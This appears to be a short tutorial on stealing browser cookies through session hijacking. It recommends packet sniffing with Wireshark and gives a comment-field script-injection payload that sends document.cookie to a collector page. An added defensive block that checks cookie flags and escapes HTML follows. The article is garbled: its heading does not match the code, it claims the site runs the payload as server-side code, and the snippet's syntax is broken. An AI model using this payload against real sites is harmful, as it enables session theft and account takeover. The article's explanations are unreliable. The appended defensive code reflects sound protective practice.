Cookie stealing is sometimes also known as session hijacking or cookie hijacking, because to steal a cookie a session must be hijacked. Cookie stealing or session hijacking is the exploitation of a session in a web browser to gain unauthorized access to information or services opened or saved in the web browser. Cookie stealing has become common among malicious hackers over time because it requires no special skills; if care is not taken, a victim's information can be stolen effortlessly.
There are several methods of performing session hijacking in order to steal cookies. They are used by malicious hackers and by web security testers carrying out penetration testing. Each method uses different tools.
The following are the 2 best methods to perform session hijacking for cookie stealing:
1. Using packet sniffers: A packet sniffer or packet analyzer, also known as a protocol analyzer or network analyzer, is a software tool, usually open source, that can be installed on a computer connected to a network. It is used for network monitoring and analysis: it intercepts network traffic, capturing and logging packets before analyzing them. To perform session hijacking to steal cookies, an attacker must capture packets or log network traffic for analysis. To do this effectively, it is advised to use a popular, widely used network packet analyzer and monitoring tool such as Wireshark.
A network packet is a unit of data transmitted in a packet-switched network. A packet consists of control information (the header) and user data, which is also known as the payload. A data packet contains the source IP address, the destination IP address and other information such as service and protocol.
How a Network Packet Analyzer Captures Packets To Perform Session Hijacking and Cookie Stealing:
The attacker pastes the following code in the comment section of a website. The website would not reject it because it thinks that it is server-side code, and it runs the code.
'<img src="http://localhost/submitcookie.php? cookie ='
+ escape(document.cookie) + '" />);
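Seen from the defending side, each of the two methods above has a direct check. The following is an added example, not code from the original article: it audits Set-Cookie headers for the Secure attribute (keeps the cookie off plain HTTP, where a sniffer could read it) and the HttpOnly attribute (hides it from document.cookie), and it encodes comment text before display. The function names, cookie names and sample values are constructed for illustration.

```javascript
// Added example: defensive checks for the two methods described in the article.
// All names and sample values here are hypothetical, constructed for illustration.

// Encode user-supplied comment text so the browser shows it as text, not markup.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Parse one Set-Cookie header value and list the protective attributes it lacks.
function auditSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim());
  const name = parts[0].split('=')[0];
  const attrs = new Set();
  for (const p of parts.slice(1)) {
    if (p) attrs.add(p.split('=')[0].trim().toLowerCase()); // attribute names are case-insensitive
  }
  const missing = [];
  if (!attrs.has('secure')) missing.push('Secure');     // may be sent over unencrypted HTTP
  if (!attrs.has('httponly')) missing.push('HttpOnly'); // readable by script via document.cookie
  return { name, missing };
}

// Return only the cookies that lack at least one protective attribute.
function findWeakCookies(headers) {
  return headers.map(auditSetCookie).filter((r) => r.missing.length > 0);
}

// Constructed sample input: response headers as a site might send them.
const sampleHeaders = [
  'PHPSESSID=abc123; Path=/',
  'prefs=dark; Path=/; secure',
  'sid=xyz789; Path=/; Secure; HttpOnly; SameSite=Lax',
];
// Constructed sample comment, modelled on the markup shown in the article.
const sampleComment = '<img src="http://localhost/submitcookie.php?cookie=" />';

for (const r of findWeakCookies(sampleHeaders)) {
  console.log(`${r.name}: missing ${r.missing.join(', ')}`);
}
console.log(escapeHtml(sampleComment));
```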